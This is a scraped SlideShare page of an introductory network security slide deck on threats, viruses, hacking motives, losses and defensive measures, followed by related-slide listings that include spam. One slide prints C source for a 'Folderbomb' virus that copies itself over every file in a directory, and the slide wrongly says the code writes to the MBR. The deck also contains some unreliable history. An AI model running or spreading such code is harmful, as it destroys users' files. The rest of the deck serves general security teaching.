SlideShare a Scribd company logo
1 of 43
NETWORK SECURITY
overview
1. Introduction
3. Common Security Threats
4.Impact of Network security on companies
5. General Strategies and Solutions
6. Security tools
2. Why is Network Security Important?
1-Introduction
• More information is being created,
stored, processed and
communicated using computers
and networks..
• The threats to information are
becoming more widespread
and more sophisticated
• Over the past nine years
people that manage network
security have seen a massive
increase of hackers and
criminals creating malicious
threats that have been
pumped into networks across
the world.
• Network security consists of the provisions
and policies adopted by a network administrator to
prevent and monitor unauthorized access, misuse,
modification, or denial of a computer network and
network-accessible resources..
• Network security covers a variety of computer
networks, both public and private, that are used in
everyday jobs conducting transactions and
communications among businesses, government
agencies and individuals.
2-Why is Network Security
Important?
-ability of a system to protect information and
system resources with respect to
confidentiality and integrity
-If the security of the network is compromised,
there could be serious consequences, such as
loss of privacy, theft of information, and even
legal liability.
- Specifically, these activities protect the
usability, reliability, integrity, and safety of
your network and data. Effective network
security targets a variety of threats and stops
them from entering or spreading on your
network.
-As time went on, and attackers' methods and
tools improved, attackers no longer required
the same level of sophisticated knowledge.
This has effectively lowered the entry-level
requirements for attackers. People who
previously would not have participated in
computer crime are now able to do so.
3- Common Security Threats.
A . Vulnerabilities.
B . Threats to Physical Infrastructure.
C . Threats to Networks .
D . Social Engineering.
E . Malicious Insiders.
F . Careless Employees.
A-Vulnerabilities
● Vulnerability is the degree of weakness
which is inherent in every network and
device. This includes routers, switches,
desktops, servers, and even security devices.
● There are three primary vulnerabilities or
weaknesses:
1-Technological weaknesses.
2-Configuration weaknesses.
3-Security policy weaknesses.
B-Treats to Physical
Infrastructure
● When you think of network security, or
even computer security, you may imagine
attackers exploiting software vulnerabilities.
A less glamorous, but no less important, class
of threat is the physical security of devices.
An attacker can deny the use of network
resources if those resources can be physically
compromised.
C-Threats to Networks
● Unstructured Threats –consist of mostly
inexperienced individuals using easily available
hacking tools, such as shell scripts and password
crackers.
● External threats
● Internal threats
● Structured Threats
D-Social Engineering
● Social Engineering :This is a way for an intruder
to gain enough information from people
to gain access to the network.
E-Malicious Insiders
● more delicate data and records are lost when a
there is a network security attack by
an insider.
F-Careless Employees
● poor training for employees and lack of
knowledge on the necessary network security
policies.
1.Shared Computers..1
3. SPAM.
4. Phishing.
5. Packet Sniffers.
2. Trojan Horses.
6. Maliciously Coded Websites.
7.Hardware Loss and Residual Data Fragments.
8. Viruses.
9. Hacking.
SICK OF COMPUTER
VIRUSES?
Whattheyare…
Wheretheycomefrom…
Whytheyarehere…
• The first computer virus was
called “Creeper.”It was
invented in the early
1970’s.Since then, millions
of viruses have been
invented.
• The first known computer
virus was written in 1981 by
a man named Rich Skrenta .
This virus was the first
computer virus to appear
outside the computer
where it was created in.
• A Computer Virus is a
program that can copy itself
and infect a computer
without the permission or
knowledge of the user.
• A Computer Virus has two
major characteristics:
• 1-the ability to replicate
itself.
• 2- ability to attach itself to
another computer file...
The following are a few Symptoms that your
computer might have a virus:
• Slow response and slow program execution.
• Random hard drive crashes and restarts.
• Distorted graphics and text.
• Files that have mysteriously vanished.
• Inability to open files with existing passwords.
Who creates viruses?
1. Information attackers.
2. PROFIT EARNERS
Ex: VIRUS / ANTIVIRUS MARKET.
Why people creates computer viruses?
-To attack the products of specific
companies.
To theft the confidential information.-
-to take revenge.
-release anger.
-for fun.
.-To distribute political messages
-.
This is a simple virus program to create a virus in c
It will create Folder in a Folder in a Folder and so on
#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{
char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————
————————–”);
printf(”nVirus: Folderbomb
1.0nProgrammer:
BAS Unnikrishnan(asystem0@gmail.com)n”);
cprintf(”————————————————
————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{
printf(”n”);
cprintf(” %s “, ffblk.ff_name);
printf(”is attacked by “);
cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINAR
YO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
It places its own codes
and commands into
MBR.
Hacking
Hacking refers to the
activities which are done
to intrude some one else’s
personal information so as
to use it for malicious,
unwanted purposes. .
Hacking is a term which
refers to the activities
aimed at exploiting
security flaws to obtain
personal information for
gaining access to secured
networks
A typical attacker works in the following manner:
Identify the target system.
Gathering Information on the target system.
Finding a possible loophole in the target system.
Exploiting this loophole using exploit code.
Removing all traces from the log files and escaping
without a trace.
1. Credit Card Information(for money)
In recent years it has become increasingly possible
for hackers to steal credit card information. With
online shopping and online banking becoming more
prevalent, the opportunity for a skilled hacker to
acquire credit card information continues to grow.
2. Identity Theft
Hackers can steal identity by simply hacking into
acomputer. With a stolen identity, a hacker can
do almost everything.
When someone hacks a computer or
network system, it's typically for
one of the following reasons:
3. Business Information
In the modern world important business
information can be stored on computers.
Hackers can steal financial information,
account numbers, and even client information.
4. Egotism
Some hackers hack computers solely to prove
that they can. These individuals may do
anything from small-scale hacking all the way
up to full-on identity
Advantages of Hacking …
-Can be used to recover lost information where the
computer password has been lost.
Teaches us that no technology is 100% secure.-
Disadvantages of Hacking …
Criminals can use it to their advantage.-
It can harm someone's privacy.-
It's illegal.-
-It destroys other people’s work..
1.USA
2.China
3.Turkey
4.Russia
5.Taiwan
6.Brazil
7.Romania
8.India
9.Italy
10.Hungary
Hackers are just people with innovative spirits and an in-depth
knowledge of technology. Hackers aren't necessarily criminals,
though as long as crime has the potential to pay, there will
always be some criminals who are hackers. There's nothing
wrong with the hacker knowledge itself, despite its potential
applications.
Therefore, do whatever you like as long as you didn’t make other
people suffered and devastated on your own action.
Most famous hackers groups
• Anonymous
• Syrian Electronic army
1. FINANCIAL LOSSES
In 2011 ,Sony lost 170 million $ due to a hack of their
PlayStation system. Also in 2011 , CitiGroup lost
2.7million $ and AT&T lost 2 million $ as a result of
hackers
2. LOSS OF INFORMATION
Hacking often results in a loss of data due to
files being deleted or changed. leak of top
secret information could cause real-world
security issues. Servers at the Pentagon,
FBI, Interpol and NASA have all been
compromised at
various points in the past ten years.
-.
According to the 2006 computer security institute
(CSI)/FBI Computer Crime and Security Survey:
- 52 percent of respondents reported unauthorized
use of computer systems
- 313 respondents reported total losses of $52 million
due to computer incidents.
-59 percent of respondents reported more than10 Web
site security incidents over a year’s time , and 36 percent
of respondents did not know how many Website security
incidents had occurred.
- Virus incidents were the greatest cause of
financial loss.
Four Worst Security Mistakes:
1-Opening unsolicited e-mail attachments without
verifying their source and checking their content
first.
2-Failing to install security patches-especially for
Microsoft Office, Microsoft Internet Explorer, and
Netscape.
3-Installing screen savers or games from unknown
sources.
4-Not making and testing backups.
.
5-Strategies and Solutions.
-virtual private
network (VPN)- links are
provided to provide remote
users secured access to their
intended network
-Secure Sockets
Layer (SSL)- now known as
Transport Layer Security (TLS)
is used to provide data
integrity and security over the
internet
-Hypertext Transfer
Protocol Secure
There are some simple steps that should be taken
that apply to most operating systems:
1-Default usernames and passwords should be changed
immediately.
2-Access to system resources should be restricted to only the
individuals that are authorized to use those resources
3-Any unnecessary services and applications should be
turned off and uninstalled, when possible.
4-Install host antivirus software to protect against known
viruses.
5-Install Personal Firewall to prevent attacks on PC.
6-Intrusion detection systems (IDS)- used to detect unauthorized access,
monitor and audit networks.
7-Penetration test- process of testing the security measures of a
computer network.
8-Backup- copy data into another location
9-Business continuity planning (BCP)- organization wide plan that depicts
how an organization will recover from interruptions .
10-Disaster recovery plan (DRP)- an IT related infrastructure recovery .
11-Appropriate use of portable storage devices .
12-Physical security- closed-circuit television cameras, access control
systems.
6- Security tools
1-Antivirus software packages
2- Secure network infrastructure.
3- IDS hardware and software.
4- Identity services.
5-Security management .
6- Virtual private network Secure, private
connection thru a public network Provides a
mechanism for secure data transmission .
7- Encryption .
8-Firewall.
Conclusion
● Regular auditing of IT infrastructure, regular
penetration test and periodic examination of the
company’s BCP .
● Network security starts with action from
individual .
● It’s not a product, it's a process.
● Network security is the responsibility of everyone.
It is better to prevent threats than to get rid of.
THANK YOU!

More Related Content

What's hot

What's hot (20)

Computer security concepts
Computer security conceptsComputer security concepts
Computer security concepts
 
Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)Network security (vulnerabilities, threats, and attacks)
Network security (vulnerabilities, threats, and attacks)
 
CYBER SECURITY
CYBER SECURITYCYBER SECURITY
CYBER SECURITY
 
Network security
Network securityNetwork security
Network security
 
Information Security Lecture Notes
Information Security Lecture NotesInformation Security Lecture Notes
Information Security Lecture Notes
 
Network Security Fundamentals
Network Security FundamentalsNetwork Security Fundamentals
Network Security Fundamentals
 
Backup and recovery
Backup and recoveryBackup and recovery
Backup and recovery
 
Basics of Information System Security
Basics of Information System SecurityBasics of Information System Security
Basics of Information System Security
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
 
Security in Windows operating system
Security in Windows operating systemSecurity in Windows operating system
Security in Windows operating system
 
Network attacks
Network attacksNetwork attacks
Network attacks
 
Network security and protocols
Network security and protocolsNetwork security and protocols
Network security and protocols
 
Cyber security
Cyber securityCyber security
Cyber security
 
System security
System securitySystem security
System security
 
Network Security Presentation
Network Security PresentationNetwork Security Presentation
Network Security Presentation
 
Network monitoring tools
Network monitoring toolsNetwork monitoring tools
Network monitoring tools
 
Information Security Lecture #1 ppt
Information Security Lecture #1 pptInformation Security Lecture #1 ppt
Information Security Lecture #1 ppt
 
Network management ppt
Network management pptNetwork management ppt
Network management ppt
 
Information security and Attacks
Information security and AttacksInformation security and Attacks
Information security and Attacks
 
Network Security ppt
Network Security pptNetwork Security ppt
Network Security ppt
 

Viewers also liked

Network Security
Network SecurityNetwork Security
Network Security
Jaya sudha
 
Network security policies
Network security policiesNetwork security policies
Network security policies
Usman Mukhtar
 
Presentation network security
Presentation network securityPresentation network security
Presentation network security
cegonsoft1999
 
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingScalable Internet Servers and Load Balancing
Scalable Internet Servers and Load Balancing
Information Technology
 
Intoduction to Network Security NS1
Intoduction to Network Security NS1Intoduction to Network Security NS1
Intoduction to Network Security NS1
koolkampus
 

Viewers also liked (20)

Network Security
Network SecurityNetwork Security
Network Security
 
Network Security 1st Lecture
Network Security 1st LectureNetwork Security 1st Lecture
Network Security 1st Lecture
 
Network Security and Cryptography
Network Security and CryptographyNetwork Security and Cryptography
Network Security and Cryptography
 
Slideshare cost of ignoring network security presentation v4
Slideshare   cost of ignoring network security presentation v4Slideshare   cost of ignoring network security presentation v4
Slideshare cost of ignoring network security presentation v4
 
Network Security
Network SecurityNetwork Security
Network Security
 
Network Security
Network SecurityNetwork Security
Network Security
 
Network Security & Ethical Hacking
Network Security & Ethical HackingNetwork Security & Ethical Hacking
Network Security & Ethical Hacking
 
Network security policies
Network security policiesNetwork security policies
Network security policies
 
A NETWORK SECURITY APPROACH USING RSA.
A NETWORK SECURITY APPROACH USING RSA.A NETWORK SECURITY APPROACH USING RSA.
A NETWORK SECURITY APPROACH USING RSA.
 
Presentation network security
Presentation network securityPresentation network security
Presentation network security
 
Network Security Lecture
Network Security LectureNetwork Security Lecture
Network Security Lecture
 
Network security - Basic concepts
Network security - Basic conceptsNetwork security - Basic concepts
Network security - Basic concepts
 
Network Security
Network SecurityNetwork Security
Network Security
 
Carrick - Introduction to Physics & Electronics - Spring Review 2012
Carrick - Introduction to Physics & Electronics - Spring Review 2012Carrick - Introduction to Physics & Electronics - Spring Review 2012
Carrick - Introduction to Physics & Electronics - Spring Review 2012
 
Functional programming with python
Functional programming with pythonFunctional programming with python
Functional programming with python
 
Lec 03 set
Lec 03   setLec 03   set
Lec 03 set
 
What is Network Security?
What is Network Security?What is Network Security?
What is Network Security?
 
Scalable Internet Servers and Load Balancing
Scalable Internet Servers and Load BalancingScalable Internet Servers and Load Balancing
Scalable Internet Servers and Load Balancing
 
Intoduction to Network Security NS1
Intoduction to Network Security NS1Intoduction to Network Security NS1
Intoduction to Network Security NS1
 
Securing Windows web servers
Securing Windows web serversSecuring Windows web servers
Securing Windows web servers
 

Similar to Network security

MIS part 4_CH 11.ppt
MIS part 4_CH 11.pptMIS part 4_CH 11.ppt
MIS part 4_CH 11.ppt
EndAlk15
 
csa2014 IBC
csa2014 IBCcsa2014 IBC
csa2014 IBC
apyn
 
Unit 03 Computer and Internet Crime [5 hrs] v1.2.pdf
Unit 03 Computer and Internet Crime [5 hrs] v1.2.pdfUnit 03 Computer and Internet Crime [5 hrs] v1.2.pdf
Unit 03 Computer and Internet Crime [5 hrs] v1.2.pdf
SujanTimalsina5
 

Similar to Network security (20)

MIS part 4_CH 11.ppt
MIS part 4_CH 11.pptMIS part 4_CH 11.ppt
MIS part 4_CH 11.ppt
 
Computer-Security.pptx
Computer-Security.pptxComputer-Security.pptx
Computer-Security.pptx
 
3Nov Challanges to Inernal Security.pptx
3Nov Challanges to Inernal Security.pptx3Nov Challanges to Inernal Security.pptx
3Nov Challanges to Inernal Security.pptx
 
Cyberattacks.pptx
Cyberattacks.pptxCyberattacks.pptx
Cyberattacks.pptx
 
THESIS-2(2)
THESIS-2(2)THESIS-2(2)
THESIS-2(2)
 
Computer hacking
Computer hackingComputer hacking
Computer hacking
 
NETWORK SECURITY AND VIRUSES
NETWORK SECURITY AND VIRUSESNETWORK SECURITY AND VIRUSES
NETWORK SECURITY AND VIRUSES
 
IRJET- Study of Hacking and Ethical Hacking
IRJET- Study of Hacking and Ethical HackingIRJET- Study of Hacking and Ethical Hacking
IRJET- Study of Hacking and Ethical Hacking
 
CS 1.ppt
CS 1.pptCS 1.ppt
CS 1.ppt
 
Rishabhcyber security.pptx
Rishabhcyber security.pptxRishabhcyber security.pptx
Rishabhcyber security.pptx
 
Brief Introduction of Hackers
Brief Introduction of HackersBrief Introduction of Hackers
Brief Introduction of Hackers
 
Hamza
HamzaHamza
Hamza
 
csa2014 IBC
csa2014 IBCcsa2014 IBC
csa2014 IBC
 
Information Assurance And Security - Chapter 2 - Lesson 2
Information Assurance And Security - Chapter 2 - Lesson 2Information Assurance And Security - Chapter 2 - Lesson 2
Information Assurance And Security - Chapter 2 - Lesson 2
 
Lesson 2
Lesson 2Lesson 2
Lesson 2
 
Unit 03 Computer and Internet Crime [5 hrs] v1.2.pdf
Unit 03 Computer and Internet Crime [5 hrs] v1.2.pdfUnit 03 Computer and Internet Crime [5 hrs] v1.2.pdf
Unit 03 Computer and Internet Crime [5 hrs] v1.2.pdf
 
Cyber Security PPT.pptx
Cyber Security PPT.pptxCyber Security PPT.pptx
Cyber Security PPT.pptx
 
A Review Paper on Cyber-Security
A Review Paper on Cyber-SecurityA Review Paper on Cyber-Security
A Review Paper on Cyber-Security
 
Introduction to Ethical Hacking
Introduction to Ethical HackingIntroduction to Ethical Hacking
Introduction to Ethical Hacking
 
Computer security
Computer securityComputer security
Computer security
 

Recently uploaded

Introduction to Robotics in Mechanical Engineering.pptx
Introduction to Robotics in Mechanical Engineering.pptxIntroduction to Robotics in Mechanical Engineering.pptx
Introduction to Robotics in Mechanical Engineering.pptx
hublikarsn
 
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak HamilCara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Kandungan 087776558899
 
Standard vs Custom Battery Packs - Decoding the Power Play
Standard vs Custom Battery Packs - Decoding the Power PlayStandard vs Custom Battery Packs - Decoding the Power Play
Standard vs Custom Battery Packs - Decoding the Power Play
Epec Engineered Technologies
 
Digital Communication Essentials: DPCM, DM, and ADM .pptx
Digital Communication Essentials: DPCM, DM, and ADM .pptxDigital Communication Essentials: DPCM, DM, and ADM .pptx
Digital Communication Essentials: DPCM, DM, and ADM .pptx
pritamlangde
 
Hospital management system project report.pdf
Hospital management system project report.pdfHospital management system project report.pdf
Hospital management system project report.pdf
Kamal Acharya
 

Recently uploaded (20)

Employee leave management system project.
Employee leave management system project.Employee leave management system project.
Employee leave management system project.
 
NO1 Top No1 Amil Baba In Azad Kashmir, Kashmir Black Magic Specialist Expert ...
NO1 Top No1 Amil Baba In Azad Kashmir, Kashmir Black Magic Specialist Expert ...NO1 Top No1 Amil Baba In Azad Kashmir, Kashmir Black Magic Specialist Expert ...
NO1 Top No1 Amil Baba In Azad Kashmir, Kashmir Black Magic Specialist Expert ...
 
Introduction to Robotics in Mechanical Engineering.pptx
Introduction to Robotics in Mechanical Engineering.pptxIntroduction to Robotics in Mechanical Engineering.pptx
Introduction to Robotics in Mechanical Engineering.pptx
 
fitting shop and tools used in fitting shop .ppt
fitting shop and tools used in fitting shop .pptfitting shop and tools used in fitting shop .ppt
fitting shop and tools used in fitting shop .ppt
 
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak HamilCara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
Cara Menggugurkan Sperma Yang Masuk Rahim Biyar Tidak Hamil
 
Path loss model, OKUMURA Model, Hata Model
Path loss model, OKUMURA Model, Hata ModelPath loss model, OKUMURA Model, Hata Model
Path loss model, OKUMURA Model, Hata Model
 
Online food ordering system project report.pdf
Online food ordering system project report.pdfOnline food ordering system project report.pdf
Online food ordering system project report.pdf
 
COST-EFFETIVE and Energy Efficient BUILDINGS ptx
COST-EFFETIVE  and Energy Efficient BUILDINGS ptxCOST-EFFETIVE  and Energy Efficient BUILDINGS ptx
COST-EFFETIVE and Energy Efficient BUILDINGS ptx
 
AIRCANVAS[1].pdf mini project for btech students
AIRCANVAS[1].pdf mini project for btech studentsAIRCANVAS[1].pdf mini project for btech students
AIRCANVAS[1].pdf mini project for btech students
 
HOA1&2 - Module 3 - PREHISTORCI ARCHITECTURE OF KERALA.pptx
HOA1&2 - Module 3 - PREHISTORCI ARCHITECTURE OF KERALA.pptxHOA1&2 - Module 3 - PREHISTORCI ARCHITECTURE OF KERALA.pptx
HOA1&2 - Module 3 - PREHISTORCI ARCHITECTURE OF KERALA.pptx
 
8086 Microprocessor Architecture: 16-bit microprocessor
8086 Microprocessor Architecture: 16-bit microprocessor8086 Microprocessor Architecture: 16-bit microprocessor
8086 Microprocessor Architecture: 16-bit microprocessor
 
Convergence of Robotics and Gen AI offers excellent opportunities for Entrepr...
Convergence of Robotics and Gen AI offers excellent opportunities for Entrepr...Convergence of Robotics and Gen AI offers excellent opportunities for Entrepr...
Convergence of Robotics and Gen AI offers excellent opportunities for Entrepr...
 
Standard vs Custom Battery Packs - Decoding the Power Play
Standard vs Custom Battery Packs - Decoding the Power PlayStandard vs Custom Battery Packs - Decoding the Power Play
Standard vs Custom Battery Packs - Decoding the Power Play
 
Linux Systems Programming: Inter Process Communication (IPC) using Pipes
Linux Systems Programming: Inter Process Communication (IPC) using PipesLinux Systems Programming: Inter Process Communication (IPC) using Pipes
Linux Systems Programming: Inter Process Communication (IPC) using Pipes
 
Worksharing and 3D Modeling with Revit.pptx
Worksharing and 3D Modeling with Revit.pptxWorksharing and 3D Modeling with Revit.pptx
Worksharing and 3D Modeling with Revit.pptx
 
Digital Communication Essentials: DPCM, DM, and ADM .pptx
Digital Communication Essentials: DPCM, DM, and ADM .pptxDigital Communication Essentials: DPCM, DM, and ADM .pptx
Digital Communication Essentials: DPCM, DM, and ADM .pptx
 
Augmented Reality (AR) with Augin Software.pptx
Augmented Reality (AR) with Augin Software.pptxAugmented Reality (AR) with Augin Software.pptx
Augmented Reality (AR) with Augin Software.pptx
 
HAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKAR
HAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKARHAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKAR
HAND TOOLS USED AT ELECTRONICS WORK PRESENTED BY KOUSTAV SARKAR
 
Theory of Time 2024 (Universal Theory for Everything)
Theory of Time 2024 (Universal Theory for Everything)Theory of Time 2024 (Universal Theory for Everything)
Theory of Time 2024 (Universal Theory for Everything)
 
Hospital management system project report.pdf
Hospital management system project report.pdfHospital management system project report.pdf
Hospital management system project report.pdf
 

Network security

  • 2. overview 1. Introduction 3. Common Security Threats 4.Impact of Network security on companies 5. General Strategies and Solutions 6. Security tools 2. Why is Network Security Important?
  • 3. 1-Introduction • More information is being created, stored, processed and communicated using computers and networks.. • The threats to information are becoming more widespread and more sophisticated • Over the past nine years people that manage network security have seen a massive increase of hackers and criminals creating malicious threats that have been pumped into networks across the world.
  • 4. • Network security consists of the provisions and policies adopted by a network administrator to prevent and monitor unauthorized access, misuse, modification, or denial of a computer network and network-accessible resources.. • Network security covers a variety of computer networks, both public and private, that are used in everyday jobs conducting transactions and communications among businesses, government agencies and individuals.
  • 5. 2-Why is Network Security Important? -ability of a system to protect information and system resources with respect to confidentiality and integrity -If the security of the network is compromised, there could be serious consequences, such as loss of privacy, theft of information, and even legal liability.
  • 6. - Specifically, these activities protect the usability, reliability, integrity, and safety of your network and data. Effective network security targets a variety of threats and stops them from entering or spreading on your network.
  • 7. -As time went on, and attackers' methods and tools improved, attackers no longer required the same level of sophisticated knowledge. This has effectively lowered the entry-level requirements for attackers. People who previously would not have participated in computer crime are now able to do so.
  • 8. 3- Common Security Threats. A . Vulnerabilities. B . Threats to Physical Infrastructure. C . Threats to Networks . D . Social Engineering. E . Malicious Insiders. F . Careless Employees.
  • 9. A-Vulnerabilities ● Vulnerability is the degree of weakness which is inherent in every network and device. This includes routers, switches, desktops, servers, and even security devices. ● There are three primary vulnerabilities or weaknesses: 1-Technological weaknesses. 2-Configuration weaknesses. 3-Security policy weaknesses.
  • 10. B-Treats to Physical Infrastructure ● When you think of network security, or even computer security, you may imagine attackers exploiting software vulnerabilities. A less glamorous, but no less important, class of threat is the physical security of devices. An attacker can deny the use of network resources if those resources can be physically compromised.
  • 11. C-Threats to Networks ● Unstructured Threats –consist of mostly inexperienced individuals using easily available hacking tools, such as shell scripts and password crackers. ● External threats ● Internal threats ● Structured Threats
  • 12. D-Social Engineering ● Social Engineering :This is a way for an intruder to gain enough information from people to gain access to the network. E-Malicious Insiders ● more delicate data and records are lost when a there is a network security attack by an insider. F-Careless Employees ● poor training for employees and lack of knowledge on the necessary network security policies.
  • 13. 1.Shared Computers..1 3. SPAM. 4. Phishing. 5. Packet Sniffers. 2. Trojan Horses.
  • 14. 6. Maliciously Coded Websites. 7.Hardware Loss and Residual Data Fragments. 8. Viruses. 9. Hacking.
  • 16. • The first computer virus was called “Creeper.”It was invented in the early 1970’s.Since then, millions of viruses have been invented. • The first known computer virus was written in 1981 by a man named Rich Skrenta . This virus was the first computer virus to appear outside the computer where it was created in.
  • 17. • A Computer Virus is a program that can copy itself and infect a computer without the permission or knowledge of the user. • A Computer Virus has two major characteristics: • 1-the ability to replicate itself. • 2- ability to attach itself to another computer file...
  • 18. The following are a few Symptoms that your computer might have a virus: • Slow response and slow program execution. • Random hard drive crashes and restarts. • Distorted graphics and text. • Files that have mysteriously vanished. • Inability to open files with existing passwords.
  • 19. Who creates viruses? 1. Information attackers. 2. PROFIT EARNERS Ex: VIRUS / ANTIVIRUS MARKET. Why people creates computer viruses? -To attack the products of specific companies. To theft the confidential information.- -to take revenge. -release anger. -for fun. .-To distribute political messages -.
  • 20. This is a simple virus program to create a virus in c It will create Folder in a Folder in a Folder and so on #include<stdio.h> #include<conio.h> #include #include #include void main(int argc,char* argv[]) { char buf[512]; int source,target,byt,done; struct ffblk ffblk; clrscr(); textcolor(2); cprintf(”———————————————— ————————–”); printf(”nVirus: Folderbomb 1.0nProgrammer: BAS Unnikrishnan(asystem0@gmail.com)n”); cprintf(”———————————————— ————————–”); done = findfirst(”*.*”,&ffblk,0); while (!done) { printf(”n”); cprintf(” %s “, ffblk.ff_name); printf(”is attacked by “); cprintf(”Folderbomb”); source=open(argv[0],O_RDONLYO_BINARY); target=open(ffblk.ff_name,O_CREATO_BINAR YO_WRONGLY); while(1) {byt=read(source,buf,512); if(byt>0) write(target,buf,byt); else break; } close(source); close(target); done = findnext(&ffblk); }
  • 21. It places its own codes and commands into MBR. Hacking
  • 22. Hacking refers to the activities which are done to intrude some one else’s personal information so as to use it for malicious, unwanted purposes. . Hacking is a term which refers to the activities aimed at exploiting security flaws to obtain personal information for gaining access to secured networks
  • 23. A typical attacker works in the following manner: Identify the target system. Gathering Information on the target system. Finding a possible loophole in the target system. Exploiting this loophole using exploit code. Removing all traces from the log files and escaping without a trace.
  • 24. 1. Credit Card Information(for money) In recent years it has become increasingly possible for hackers to steal credit card information. With online shopping and online banking becoming more prevalent, the opportunity for a skilled hacker to acquire credit card information continues to grow. 2. Identity Theft Hackers can steal identity by simply hacking into acomputer. With a stolen identity, a hacker can do almost everything. When someone hacks a computer or network system, it's typically for one of the following reasons:
  • 25. 3. Business Information In the modern world important business information can be stored on computers. Hackers can steal financial information, account numbers, and even client information. 4. Egotism Some hackers hack computers solely to prove that they can. These individuals may do anything from small-scale hacking all the way up to full-on identity
  • 26. Advantages of Hacking … -Can be used to recover lost information where the computer password has been lost. Teaches us that no technology is 100% secure.- Disadvantages of Hacking … Criminals can use it to their advantage.- It can harm someone's privacy.- It's illegal.- -It destroys other people’s work..
  • 28. Hackers are just people with innovative spirits and an in-depth knowledge of technology. Hackers aren't necessarily criminals, though as long as crime has the potential to pay, there will always be some criminals who are hackers. There's nothing wrong with the hacker knowledge itself, despite its potential applications. Therefore, do whatever you like as long as you didn’t make other people suffered and devastated on your own action.
  • 29. Most famous hackers groups • Anonymous
  • 31.
  • 32. 1. FINANCIAL LOSSES In 2011 ,Sony lost 170 million $ due to a hack of their PlayStation system. Also in 2011 , CitiGroup lost 2.7million $ and AT&T lost 2 million $ as a result of hackers 2. LOSS OF INFORMATION Hacking often results in a loss of data due to files being deleted or changed. leak of top secret information could cause real-world security issues. Servers at the Pentagon, FBI, Interpol and NASA have all been compromised at various points in the past ten years. -.
  • 33. According to the 2006 computer security institute (CSI)/FBI Computer Crime and Security Survey: - 52 percent of respondents reported unauthorized use of computer systems - 313 respondents reported total losses of $52 million due to computer incidents. -59 percent of respondents reported more than10 Web site security incidents over a year’s time , and 36 percent of respondents did not know how many Website security incidents had occurred. - Virus incidents were the greatest cause of financial loss.
  • 34.
  • 35. Four Worst Security Mistakes: 1-Opening unsolicited e-mail attachments without verifying their source and checking their content first. 2-Failing to install security patches-especially for Microsoft Office, Microsoft Internet Explorer, and Netscape. 3-Installing screen savers or games from unknown sources. 4-Not making and testing backups. .
  • 36. 5-Strategies and Solutions. -virtual private network (VPN)- links are provided to provide remote users secured access to their intended network -Secure Sockets Layer (SSL)- now known as Transport Layer Security (TLS) is used to provide data integrity and security over the internet -Hypertext Transfer Protocol Secure
  • 37. There are some simple steps that should be taken that apply to most operating systems: 1-Default usernames and passwords should be changed immediately. 2-Access to system resources should be restricted to only the individuals that are authorized to use those resources 3-Any unnecessary services and applications should be turned off and uninstalled, when possible. 4-Install host antivirus software to protect against known viruses. 5-Install Personal Firewall to prevent attacks on PC.
  • 38. 6-Intrusion detection systems (IDS)- used to detect unauthorized access, monitor and audit networks. 7-Penetration test- process of testing the security measures of a computer network. 8-Backup- copy data into another location 9-Business continuity planning (BCP)- organization wide plan that depicts how an organization will recover from interruptions . 10-Disaster recovery plan (DRP)- an IT related infrastructure recovery . 11-Appropriate use of portable storage devices . 12-Physical security- closed-circuit television cameras, access control systems.
  • 39.
  • 40. 6- Security tools 1-Antivirus software packages 2- Secure network infrastructure. 3- IDS hardware and software. 4- Identity services. 5-Security management . 6- Virtual private network Secure, private connection thru a public network Provides a mechanism for secure data transmission . 7- Encryption . 8-Firewall.
  • 41.
  • 42. Conclusion ● Regular auditing of IT infrastructure, regular penetration test and periodic examination of the company’s BCP . ● Network security starts with action from individual . ● It’s not a product, it's a process. ● Network security is the responsibility of everyone. It is better to prevent threats than to get rid of.